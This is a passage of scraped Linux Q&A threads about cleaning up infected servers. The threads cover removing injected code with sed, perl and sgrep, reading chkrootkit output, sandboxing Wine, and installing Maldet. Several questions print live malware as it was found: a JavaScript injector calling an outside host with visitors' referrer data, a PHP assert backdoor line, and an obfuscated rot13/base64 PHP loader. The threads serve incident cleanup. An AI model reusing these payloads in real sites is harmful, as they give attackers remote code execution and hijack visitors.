nastiest potentials there by never running WINE as root.
I have installed wine and I am afraid that viruses will affect my PC now. I will not open any other .exe file other than mine one (which I use everyday)
Could Autorun Virus, affect my PC via Wine? [duplicate]
If, as your answer says, the payload is on a single line by itself, this will do it, while creating backups of the files altered: find -name header.php -exec sed -i.bak '/someplacedodgy\.kr\/js\/jquery.min.php/d' {} \; -lsJust be sure that the "someplacedodgy" string is unique to the payload lines. Omit the .bak from -i.bak if you wish to skip the backups.
I have a number of header.php files that have a malicious script tag contained within them (don't ask). I've written a not-so-elegant shell script to replace these with blank space. I had initially tried to subtract the payload from the header.php but this didn't seem possible as the file was not a sorted list. Below is my code: echo 'Find all header.php files' find -name header.php -print0 > tempheader echo 'Remove malware script from headers' cat tempheader | xargs -0 sed -i 's/\<script\>var a=''; setTimeout(10); var default_keyword = encodeURIComponent(document.title); var se_referrer = encodeURIComponent(document.referrer); var host = encodeURIComponent(window.location.host); var base = "http:\/\/someplacedodgy.kr\/js\/jquery.min.php"; var n_url = base + "?default_keyword=" + default_keyword + "\&se_referrer=" + se_referrer + "\&source=" + host; var f_url = base + "?c_utt=snt2014\&c_utm=" + encodeURIComponent(n_url); if (default_keyword !== null \&\& default_keyword !== '' \&\& se_referrer !== null \&\& se_referrer !== ''){document.write('\<script type="text\/javascript" src="' + f_url + '"\>' + '\<' + '\/script\>');}\<\/script\>/ /g'The issue is that this code fails to execute with the error: sed: -e expression #1, char 578: unterminateds' command`. My assumption is that there are unescaped characters causing this issue, I have tried escaping all <> and {}'s, however this didn't seem to help (note the <> are still escaped above). If there is a way to input a file containing the string into sed like sed -i 's/$payload/ /g' I have not been able to work that out yet.
How to remove a script tag from a text file with sed
Unfortunately my server is infected... =\ Part of the Chkrootkit security utility output ( http://www.chkrootkit.org/ )... NOTE: Information confirmed via system analysis! [...] Searching for Linux.Xor.DDoS ... INFECTED: Possible Malicious Linux.Xor.DDoS installed /tmp/.X19-unix/.rsync/c/lib/64/libc.so.6 /tmp/.X19-unix/.rsync/c/lib/64/libpthread.so.0 /tmp/.X19-unix/.rsync/c/lib/64/tsm /tmp/.X19-unix/.rsync/c/lib/32/libc.so.6 /tmp/.X19-unix/.rsync/c/lib/32/libpthread.so.0 /tmp/.X19-unix/.rsync/c/lib/32/tsm /tmp/.X19-unix/.rsync/c/lib/arm/libc.so.6 /tmp/.X19-unix/.rsync/c/lib/arm/libpthread.so.0 /tmp/.X19-unix/.rsync/c/lib/arm/tsm /tmp/.X19-unix/.rsync/c/slow /tmp/.X19-unix/.rsync/c/tsm /tmp/.X19-unix/.rsync/c/watchdog /tmp/.X19-unix/.rsync/c/run /tmp/.X19-unix/.rsync/c/go /tmp/.X19-unix/.rsync/c/tsm32 /tmp/.X19-unix/.rsync/c/tsmv7 /tmp/.X19-unix/.rsync/c/start /tmp/.X19-unix/.rsync/c/tsm64 /tmp/.X19-unix/.rsync/c/stop /tmp/.X19-unix/.rsync/c/v /tmp/.X19-unix/.rsync/c/golan /tmp/.X19-unix/.rsync/c/dir.dir /tmp/.X19-unix/.rsync/c/n /tmp/.X19-unix/.rsync/c/aptitude /tmp/.X19-unix/.rsync/init /tmp/.X19-unix/.rsync/init2 /tmp/.X19-unix/.rsync/initall /tmp/.X19-unix/.rsync/a/anacron /tmp/.X19-unix/.rsync/a/run /tmp/.X19-unix/.rsync/a/stop /tmp/.X19-unix/.rsync/a/a /tmp/.X19-unix/.rsync/a/cron /tmp/.X19-unix/.rsync/a/init0 /tmp/.X19-unix/.rsync/b/run /tmp/.X19-unix/.rsync/b/stop /tmp/.X19-unix/.rsync/b/a /tmp/.X19-unix/.rsync/1 /tmp/.X19-unix/.rsync/dir.dir [...]ACTIONS TAKEN: Destroy the compromised server. Change "root" passwords in the local Infrastructure. Change passwords for users able to run as "root". TIP: Chkrootkit is installed and configured by the private_tux tool ( https://github.com/eduardolucioac/private_tux ). It installs and configures security utilities and performs various security diagnostics automatically. Disclosure: I am the author of private_tux.
One of my "CentOS 7" servers is showing very strange behavior. A user named "impress+" executes a command called "cron". This "cron" command is executed with a high CPU consumption. I worry because I suspect it may be malware... This server has nothing installed, just "sshd" running.QUESTION: What can I do to find out more about this "impress+" user and this "cron" command? Thanks! =D
CentOS 7 Malware? - User "impress+" executes a command ("cron") with a high CPU consumption
I wouldn't say that this should be disregarded, but I agree with duskwuff that the presentation of the message is nonsense. And I agree that, even if Bitdefender found something in /dev/fd/9, it was specific and localized to a process that was running at that instant, and you won't find anything in /dev/fd now. I suggest that youresearch "Salfeld.Child.Control", "BRD\BRD\keygen\Keygen.exe", and other strings from the messages, and get another anti-virus product.The Bitdefender screen talks about "messages" and "Subject" lines. Do you have email onyour system? Is there a message with Subject "child control"? The problem might be there. Be careful; if the message has attachments, do not open them. Your question title is wrong; there's nothing in your question about "tty". The problem wasreported in fd9; the only ttys in your questions are file descriptors0, 1 and2.
While trying to make sure I have no threats on my iMac I used Bitdefender to perform a full scan and I found this Output of running ls -la in /dev/fd: ls -la total 11 dr-xr-xr-x 1 root wheel 0 Nov 25 16:43 . dr-xr-xr-x 3 root wheel 5426 Nov 25 16:43 .. crw---w--- 1 ahmedyounes tty 16, 1 Nov 26 03:42 0 crw---w--- 1 ahmedyounes tty 16, 1 Nov 26 03:42 1 crw---w--- 1 ahmedyounes tty 16, 1 Nov 26 03:42 2 dr--r--r-- 1 root wheel 0 Nov 25 16:43 3 dr--r--r-- 1 root wheel 0 Nov 25 16:43 4 dr--r--r-- 1 root wheel 0 Nov 25 16:43 5How can I clear this threat even its just .exe keygen? What it may be the source of this threat? Update after solving it thanks to Scott , duskwuff and JigglyNaga it was strange that I couldn't delete it from my iMac until I went to Gmail from the website and found it.
Threats found in /dev/fd
You can combine sed with find to make it recursive. Something like that: find . -type f -name "*php" -exec sed -i.bak 's/extract($_REQUEST) && @assert(stripslashes($accept)) && exit;//' {} \+Note that it will walk through your current directory tree and apply sed to every existing "*php" file. It will also create .bak backup file for every changed one (so you could restore it later just in case). If you don't need a backup, replace -i.bak just with -i. Otherwise you can remove backups later (once you verified it's all fine) with something like find . -name "*php.bak" -delete. This step won't help you to fix everything right now, but it might definitely save you time in the future: keep your directory with scripts under git (well ideally it should be a complete CI/CD solution, but you can start just with git), so you could easily roll back / forward changes which were applied to your files.
I have my site infected by a virus. This virus added this line in several files in my site. My idea is to remove this line of text with a unique command from the terminal. Let's say I have the folder 'my-folder' and inside it, my files: 'file-1.php', 'file-2.php' and so on. And, let's say there are several files infected. Is there a command to find and remove this line of code in several file at once? Text to remove: extract($_REQUEST) && @assert(stripslashes($accept)) && exit; I found this, but it only works with a single file: $ sed 's/extract($_REQUEST) && @assert(stripslashes($accept)) && exit;//' my-file.php Can I do this?
Linux command to find and remove text from several files at once
Run wine via firejail. Some examples and discussion: https://github.com/netblue30/firejail/issues/2219
After installing Wine I found that there is a z drive that has direct access to root folder. I have seen many threads and news about virus affecting a linux system through wine. How do I make it more secure?
How to use wine with more security?
Once a malware has made it through your system, the system must be considered compromised and unreliable. Therefore any mitigation countermeasure, e.g. blocking connections to specific IPs, is unsafe. Unless you reverse-engineered the malware and have acquired a perfect understanding of how it works, you can never be sure it won't pop up something bad again one day. The only good option is to reformat your machine i.e. "nuke it from orbit", and reinstall again.
Let's say, somehow a malware is present on your filesystem (e.g : BusyWinman Malware). How would you secure your files against being transfered by such a malware to somewhere else? Please, describe the most restrictive case.
Securing files against malware [closed]
In general, you don't have to worry about a Linux rootkit spreading to a Windows system, but you have to be aware that a compromised network can open any system on it up to similar problems. Don't delete /sbin/init! It controls your boot/shutdown, so deleting it will leave you with an unbootable system. chkrootkit only looks for signatures, it doesn't check for the presence of known rootkit files, making it prone to false positives. Java is notorious for triggering these false positives, as are many other programming tools. You're going to want to install rkhunter and scan your system, as it looks for signature files, but it's also prone to false positives, so don't be too quick to remove files without double-checking whether they belong there or not. If your distro has a livecd, you can often copy that /sbin/init to the system, and it should boot okay, but no guarantees. Personally, if you're certain your password is compromised on a system acting as a firewall for a network, I'd opt for a fresh install and do a more thorough job securing the system. Tools like chkrootkit and rkhunter tend to be more useful for endpoint systems, especially for home users, rather than for primary entrance points, mainly because by nature, they're always chasing new developments in the security realm, so they'll never block the newest exploits. Once a firewall is rooted, it's important to check all the systems on the network, as well. A Linux firewall may have it's password changed to lock you out, but a Windows system is an easy target, too. It's possible that such a blatant attack means that the attacker intended to blackmail you for access into your locked out system, so check your mail logs, there might be a message in there asking for money, and preferably report the problem to the authorities in your area, so they can assist in tracking down these groups.
I tried logging in to my admin account and it said password incorrect. There is no way it could have been incorrect since I copy-pasted it from a usb drive. I reset my password, installed chkrootkit and found out that I've been infected with a rootkit. So what do I do, just delete the files chkrootkit reported? Here is the terminal output: user1@user1-linux ~ $ sudo chkrootkit [sudo] password for username: ROOTDIR is `/' Checking `amd'... not found Checking `basename'... not infected Checking `biff'... not found Checking `chfn'... not infected Checking `chsh'... not infected Checking `cron'... not infected Checking `crontab'... not infected Checking `date'... not infected Checking `du'... not infected Checking `dirname'... not infected Checking `echo'... not infected Checking `egrep'... not infected Checking `env'... not infected Checking `find'... not infected Checking `fingerd'... not found Checking `gpm'... not found Checking `grep'... not infected Checking `hdparm'... not infected Checking `su'... not infected Checking `ifconfig'... not infected Checking `inetd'... not infected Checking `inetdconf'... not found Checking `identd'... not found Checking `init'... not infected Checking `killall'... not infected Checking `ldsopreload'... not infected Checking `login'... not infected Checking `ls'... not infected Checking `lsof'... not infected Checking `mail'... not found Checking `mingetty'... not found Checking `netstat'... not infected Checking `named'... not found Checking `passwd'... not infected Checking `pidof'... not infected Checking `pop2'... not found Checking `pop3'... not found Checking `ps'... not infected Checking `pstree'... not infected Checking `rpcinfo'... not found Checking `rlogind'... not found Checking `rshd'... not found Checking `slogin'... not infected Checking `sendmail'... not found Checking `sshd'... not found Checking `syslogd'... not tested Checking `tar'... not infected Checking `tcpd'... not infected Checking `tcpdump'... not infected Checking `top'... not infected Checking `telnetd'... not found Checking `timed'... not found Checking `traceroute'... not found Checking `vdir'... not infected Checking `w'... not infected Checking `write'... not infected Checking `aliens'... no suspect files Searching for sniffer's logs, it may take a while... nothing found Searching for rootkit HiDrootkit's default files... nothing found Searching for rootkit t0rn's default files... nothing found Searching for t0rn's v8 defaults... nothing found Searching for rootkit Lion's default files... nothing found Searching for rootkit RSHA's default files... nothing found Searching for rootkit RH-Sharpe's default files... nothing found Searching for Ambient's rootkit (ark) default files and dirs... nothing found Searching for suspicious files and dirs, it may take a while... The following suspicious files and directories were found: /usr/lib/python3/dist-packages/PyQt4/uic/widget-plugins/.noinit /usr/lib/jvm/.java-1.7.0-openjdk-amd64.jinfo /usr/lib/python2.7/dist-packages/PyQt4/uic/widget-plugins/.noinit /usr/lib/pymodules/python2.7/.path /lib/modules/3.19.0-32-generic/vdso/.build-id /lib/modules/3.19.0-32-generic/vdso/.build-id Searching for LPD Worm files and dirs... nothing found Searching for Ramen Worm files and dirs... nothing found Searching for Maniac files and dirs... nothing found Searching for RK17 files and dirs... nothing found Searching for Ducoci rootkit... nothing found Searching for Adore Worm... nothing found Searching for ShitC Worm... nothing found Searching for Omega Worm... nothing found Searching for Sadmind/IIS Worm... nothing found Searching for MonKit... nothing found Searching for Showtee... nothing found Searching for OpticKit... nothing found Searching for T.R.K... nothing found Searching for Mithra... nothing found Searching for LOC rootkit... nothing found Searching for Romanian rootkit... nothing found Searching for Suckit rootkit... Warning: /sbin/init INFECTED Searching for Volc rootkit... nothing found Searching for Gold2 rootkit... nothing found Searching for TC2 Worm default files and dirs... nothing found Searching for Anonoying rootkit default files and dirs... nothing found Searching for ZK rootkit default files and dirs... nothing found Searching for ShKit rootkit default files and dirs... nothing found Searching for AjaKit rootkit default files and dirs... nothing found Searching for zaRwT rootkit default files and dirs... nothing found Searching for Madalin rootkit default files... nothing found Searching for Fu rootkit default files... nothing found Searching for ESRK rootkit default files... nothing found Searching for rootedoor... nothing found Searching for ENYELKM rootkit default files... nothing found Searching for common ssh-scanners default files... nothing found Searching for suspect PHP files... nothing found Searching for anomalies in shell history files... nothing found Checking `asp'... not infected Checking `bindshell'... not infected Checking `lkm'... chkproc: nothing detected chkdirs: nothing detected Checking `rexedcs'... not found Checking `sniffer'... lo: not promisc and no packet sniffer sockets eth0: PACKET SNIFFER(/sbin/dhclient[1166]) Checking `w55808'... not infected Checking `wted'... chkwtmp: nothing deleted Checking `scalper'... not infected Checking `slapper'... not infected Checking `z2'... user user2 deleted or never logged from lastlog! user user1 deleted or never logged from lastlog! user user3 deleted or never logged from lastlog! Checking `chkutmp'... The tty of the following user process(es) were not found in /var/run/utmp ! ! RUID PID TTY CMD ! rasmus 2650 pts/0 /usr/bin/xflux -l 60° -k 3400 -nofork chkutmp: nothing deleted Checking `OSX_RSPLUG'... not infectedSorry about the messed up formatting, I don't know how to get it to display properly. Anyways, these files are infected: The following suspicious files and directories were found: /usr/lib/python3/dist-packages/PyQt4/uic/widget-plugins/.noinit /usr/lib/jvm/.java-1.7.0-openjdk-amd64.jinfo /usr/lib/python2.7/dist-packages/PyQt4/uic/widget-plugins/.noinit /usr/lib/pymodules/python2.7/.path /lib/modules/3.19.0-32-generic/vdso/.build-id /lib/modules/3.19.0-32-generic/vdso/.build-idSearching for Suckit rootkit... Warning: /sbin/init INFECTEDI also changed the firewalls settings so that it logs any suspicious action. I'm on Windows right now; I hope it can't spread to my Windows partition? EDIT: I'm using Linux Mint as my personal OS so no networks are affected. I'll just wipe the drive.
Linux Mint: I'm infected with a rootkit
perl will have to 'slurp' up the whole file in order to match \n character, so use the -0777 option: perl -i -0777pe 's/var hglgfdrr4634hezfdg = 1; var d=document;var s=d\.createElement\(\x27script\x27\); s\.type=\x27text\/javascript\x27; s\.async=true;\nvar pl = String\.fromCharCode\(104,116,\.\.\.,106,115\); s\.src=pl;\nif \(document\.currentScript\) {\ndocument\.currentScript\.parentNode\.insertBefore\(s, document\.currentScript\);\n} else {\nd\.getElementsByTagName\(\x27head\x27\)\[0]\.appendChild\(s\);\n}\n//' script.jsAlthough with a hacked server there are likely more problems that need to be addressed.
A server of mine was hacked, and they added at the beginning of every js file the following: var hglgfdrr4634hezfdg = 1; var d=document;var s=d.createElement('script'); s.type='text/javascript'; s.async=true; var pl = String.fromCharCode(104,116,...,106,115); s.src=pl; if (document.currentScript) { document.currentScript.parentNode.insertBefore(s, document.currentScript); } else { d.getElementsByTagName('head')[0].appendChild(s); }I need to clean them and I can't manually since they are thousands of files. I'm struggling to find a working solution, I read about perl, and I wrote this: perl -pi -e 's/var hglgfdrr4634hezfdg = 1; var d=document;var s=d\.createElement\(\x27script\x27\); s\.type=\x27text\/javascript\x27; s\.async=true;\nvar pl = String\.fromCharCode\(104,116,...,106,115\); s\.src=pl;\nif \(document\.currentScript\) \{\ndocument\.currentScript\.parentNode\.insertBefore\(s, document\.currentScript\);\n} else \{\nd\.getElementsByTagName\(\x27head\x27\)\[0\]\.appendChild\(s\);\n\}//' script.jsI tried on regex101 and the regex matches, the command gives no errors, but nothing is replaced...
Replace (remove) multiple lines from files
In cd maldetect-*, all files and directories that match that pattern are expanded on the command line. You have at least the .tar file, and probably a directory that was found inside it. You can only be in one directory at a time, so cd to multiple directories makes no sense. In cd "maldetect-*", there's no expansion. The command itself is fine, but you probably don't have a directory with an asterisk in the name, so it won't find anything to cd to. If you know you only ever have one directory that matches the pattern, you could use cd maldetect-*/ with a trailing slash to ask the shell to only expand directory names. If you can have multiple directories that match the pattern, you'll have to either find the newest one or look inside the archive to find the name of the directory there. Finding the newest is discussed in BashFAQ 003 (or maybe BashFAQ 099), and probably some questions on-site, like Find newest file. Multiple Filetype restrictions. In the trivial case where all file names are known to be nice ls -tr | tail -1 might work, but see Why you shouldn't parse the output of ls(1). Of course it shouldn't be too hard to peek inside the archive, but this also assumes the archive is 'nice' in a number of ways: $ tar tzf maldetect-current.tar.gz | head -1 | cut -d/ -f1 maldetect-1.6.2
I'm installing Maldet on Debian 9.3: cd /usr/local/src wget http://www.rfxn.com/downloads/maldetect-current.tar.gz tar -xzvf maldetect-current.tar.gz cd maldetect-* bash ./install.shWhile doing cd maldetect-* I got:Bash: Too many argumentsI tried doing cd "maldetect-*" but this command is invalid. Why can't I access the dir?...
cd fails when trying to enter maldetect version-agnostic directory
If you want to edit text defined by a context-free language (nested matching begin and end tags, e.g. HTML or XML), you should use a tool made for that instead of a tool for regular expressions. Such a tool is for example sgrep (available as a package for many linux distros): You can match (nested) regions defined by beginning and ending tags, and manipulate them. So for example sgrep -o '%r\n' '(start .. end) extracting ("<?php".."?>" containing "###=CACHE START=###")'will remove any region starting with <?php and ending with ?> that contains ###=CACHE START=### from your file, by printing all other regions separated by a newline. Newlines and white space are not considered relevant for matching, so multiline matches are for free.
I have a server with thousands of files containing a multi-line pattern that I want to globally find & replace. Here's a sample of the pattern: <div class="fusion-header-sticky-height"></div> <div class="fusion-header"> <div class="fusion-row"> <?php avada_logo(); ?> <?php avada_main_menu(); ?> </div> </div><?php //###=CACHE START=### @error_reporting(E_ALL); @ini_set("error_log",NULL); @ini_set("log_errors",0); @ini_set("display_errors", 0); @error_reporting(0); $wa = ASSERT_WARNING; @assert_options(ASSERT_ACTIVE, 1); @assert_options($wa, 0); @assert_options(ASSERT_QUIET_EVAL, 1);$strings = "as"; $strings .= "se"; $strings .= "rt"; $strings2 = "st"; $strings2 .= "r_r"; $strings2 .= "ot13"; $gbz = "riny(".$strings2("base64_decode"); $light = $strings2($gbz.'("nJLtXPScp3AyqPtxnJW2XFxtrlNtMKWlo3WspzIjo3W0nJ5aXQNcBjccMvtuMJ1jqUxbWS9QG09YFHIoVzAfnJIhqS9wnTIwnlWqXFxtrlOyL2uiVPEsD09CF0ySJlWwoTyyoaEsL2uyL2fvKGftsFOyoUAyVUfXWUIloPN9VPWbqUEjBv8ioT9uMUIjMTS0MKZhL29gY2qyqP5jnUN/nKN9Vv51pzkyozAiMTHbWS9GEIWJEIWoVyWSGH9HEI9OEREFVy0cYvVzMQ0vYaIloTIhL29xMFtxK1ASHyMSHyfvH0IFIxIFK05OGHHvKF4xK1ASHyMSHyfvHxIEIHIGIS9IHxxvKFxhVvM1CFVhqKWfMJ5wo2EyXPEsH0IFIxIFJlWVISEDK1IGEIWsDHqSGyDvKFxhVvMcCGRznQ0vYz1xAFtvZwSxLGVkAwqzBJEvBTSwAwV4ZwLkMGp3AQyvLJH1ZwDkZFVcBjccMvuzqJ5wqTyioy9yrTymqUZbVzA1pzksnJ5cqPVcXFO7PvEwnPN9VTA1pzksnJ5cqPtxqKWfXGfXL3IloS9mMKEipUDbWTAbYPOQIIWZG1OHK0uSDHESHvjtExSZH0HcB2A1pzksp2I0o3O0XPEwqKWfYPOQIIWZG1OHK0ACGx5SD1EHFH1SG1IHYPN1XGftL3IloS9mMKEipUDbWTA1pzjfVRAIHxkCHSEsIRyAEH9IIPjtAFx7PzA1pzksp2I0o3O0XPEwnPjtD1IFGR9DIS9FEIEIHx5HHxSBH0MSHvjtISWIEFx7PvEcLaLtCFOwqKWfK2I4MJZbWTAbXGfXL3IloS9woT9mMFtxL2tcBjc9VTIfp2IcMvucozysM2I0XPWuoTkiq191pzksMz9jMJ4vXFN9CFNkXFO7PvEcLaLtCFOznJkyK2qyqS9wo250MJ50pltxqKWfXGfXsDccMvucp3AyqPtxK1WSHIISH1EoVaNvKFxtWvLtoJD1XT1xAFtxK1WSHIISH1EoVaNvKFxcVQ09VPVkAwN0MwH5ZmxjZwp3ZGVlBGp1BJDjMQHkAGyzA2HkLvVcVUftMKMuoPumqUWcpUAfLKAbMKZbWS9FEISIEIAHJlWwVy0cXGftsDcyL2uiVPEcLaL7PtxWPK0tsD=="));'); $strings($light); //###=CACHE END=### ?>I've tried various methods to find and replace this string but its multiline nature has got me stumped. I've looked around extensively (over a day of searching) and the solutions I've found can't handle the multi-line nature of this. Any assistance would be most welcome.UPDATE I've got a solution now, largely thanks to the accepted answer. Others facing something similar should look at my github project for this.
Global multiline search & replace